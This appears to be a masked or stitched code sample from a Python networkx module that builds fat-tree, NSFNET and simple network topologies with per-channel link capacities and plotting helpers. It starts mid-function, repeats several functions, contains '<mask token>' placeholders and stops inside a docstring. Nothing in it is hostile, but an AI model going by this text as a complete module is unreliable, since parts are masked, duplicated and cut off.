servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
            assume there is no rack system grouping multiple servers into one
            rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
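# Sketch (illustrative): after initialisation, rack membership is exposed as
# string-keyed dicts on the graph.
#
#     >>> net = gen_nsfnet_network(N=2)
#     >>> net.graph['ep_to_rack_dict']['server_0']
#     '0'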
<mask token>
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
        network (networkx graph): Network containing edges to which attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
    or network[0][1]['1_to_0_port']['channels']['channel_1'] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
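# --- Illustrative sketch, not part of the original module ---
# A minimal check of the per-port attributes set above: with the default
# bidirectional_links=True, each direction's port holds channel_capacity/2.
def _example_edge_attr_access():
    import networkx as nx
    g = nx.Graph()
    g.add_edge('a', 'b')
    add_edges_capacity_attrs(g, [('a', 'b')], ['channel_1'], 500)
    assert g['a']['b']['a_to_b_port']['channels']['channel_1'] == 250.0
    assert g['a']['b']['b_to_a_port']['max_channel_capacity'] == 250.0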
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
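# --- Illustrative sketch, not part of the original module ---
# Node types are matched by substring, so 'server_3' is grouped under
# 'server'; a hypothetical check of that grouping:
def _example_node_type_dict():
    import networkx as nx
    g = nx.Graph()
    g.add_nodes_from(['server_0', 'server_1', 'rack_0'])
    d = get_node_type_dict(g, node_types=['server', 'rack'])
    assert d == {'server': ['server_0', 'server_1'], 'rack': ['rack_0']}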
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
def init_network_node_positions(net):
"""Initialises network node positions for plotting."""
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
        font_size (int,float): Size of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
        matplotlib.figure.Figure: figure of the plotted network.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
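# --- Illustrative sketch, not part of the original module ---
# Typical call pattern for plot_network. Note path_to_save pickles the
# matplotlib figure (via tools.pickle_data) rather than writing an image
# file, so the path carries no image extension.
def _example_plot(network):
    return plot_network(network, draw_node_labels=True, fig_scale=1,
        path_to_save=None, show_fig=False)  # e.g. path_to_save='data/my_plot'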
<mask token>
| <mask token>
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
    indexing purposes when using the Demand class. This is useful where you
    want to use the Demand class but not necessarily with a carefully crafted
    networkx graph that accurately mimics the network you will use for the
    demands.
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
            rack ids, values are list of end points. If None, assume there is
            no clustering/rack system grouping different end points into
            different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
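# --- Illustrative sketch, not part of the original module ---
# gen_arbitrary_network builds endpoint names only (no edges), which is
# enough for demand generation. A small sanity check of the naming and the
# max-capacity bookkeeping (num_eps * ep_capacity * num_channels / 2):
def _example_arbitrary_network():
    net = gen_arbitrary_network(num_eps=4, ep_label='server', ep_capacity=10)
    assert net.graph['endpoints'] == ['server_0', 'server_1', 'server_2',
        'server_3']
    assert net.graph['max_nw_capacity'] == 20.0
    assert len(net.edges) == 0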
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
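# --- Illustrative sketch, not part of the original module ---
# With N=0 every NSFNET node is an endpoint; the duplicated [4, 5] pair in
# node_pair_list is collapsed by networkx, leaving the 21 NSFNET links.
def _example_nsfnet():
    net = gen_nsfnet_network(N=0, num_channels=1)
    assert len(net.nodes) == 14
    assert len(net.edges) == 21
    assert len(net.graph['endpoints']) == 14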
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
        server_to_rack_channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
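# --- Illustrative sketch, not part of the original module ---
# The 5-node toy topology has 6 links, so with the defaults below
# max_nw_capacity = 6 links * 2 channels * 500 B per channel / 2 = 3000.
def _example_simple_network():
    net = gen_simple_network(num_channels=2,
        server_to_rack_channel_capacity=500)
    assert len(net.edges) == 6
    assert net.graph['max_nw_capacity'] == 3000.0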
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
        n (int): Number of servers per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
        aggregate_label (str,int): Label to assign to aggregate switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
        server_to_rack_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
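# --- Illustrative sketch, not part of the original module ---
# For a 2-layer (spine-leaf) fat tree with k=4 and n=4: (k/2)^(L/2) = 2
# cores, 2*(k/2)^(L-1) = 4 racks and 4*n = 16 servers, matching the
# parameter equations in the docstring above.
def _example_fat_tree_l2():
    net = gen_fat_tree(k=4, L=2, n=4)
    assert len(net.graph['endpoints']) == 16
    assert len(net.graph['rack_to_ep_dict']) == 4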
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
            assume there is no rack system grouping multiple servers into
            one rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
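# --- Illustrative sketch, not part of the original module ---
# Rack dict keys/values are stringified before being stored on the graph,
# and an inverse endpoint-to-rack mapping is derived; e.g.:
def _example_rack_dicts():
    net = gen_arbitrary_network(num_eps=2, ep_label='server',
        racks_dict={0: ['server_0', 'server_1']})
    assert net.graph['rack_to_ep_dict'] == {'0': ['server_0', 'server_1']}
    assert net.graph['ep_to_rack_dict']['server_1'] == '0'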
def gen_channel_names(num_channels):
"""Generates channel names for channels on each link in network."""
channels = [(channel + 1) for channel in range(num_channels)]
channel_names = [('channel_' + str(channel)) for channel in channels]
return channel_names
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
        network (networkx graph): Network containing edges to which attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
    or network[0][1]['1_to_0_port']['channels']['channel_1'] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
def init_network_node_positions(net):
"""Initialises network node positions for plotting."""
if net.graph['topology_type'] == 'fat_tree':
pos = get_fat_tree_positions(net)
else:
pos = nx.nx_agraph.graphviz_layout(net, prog='neato')
return pos
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
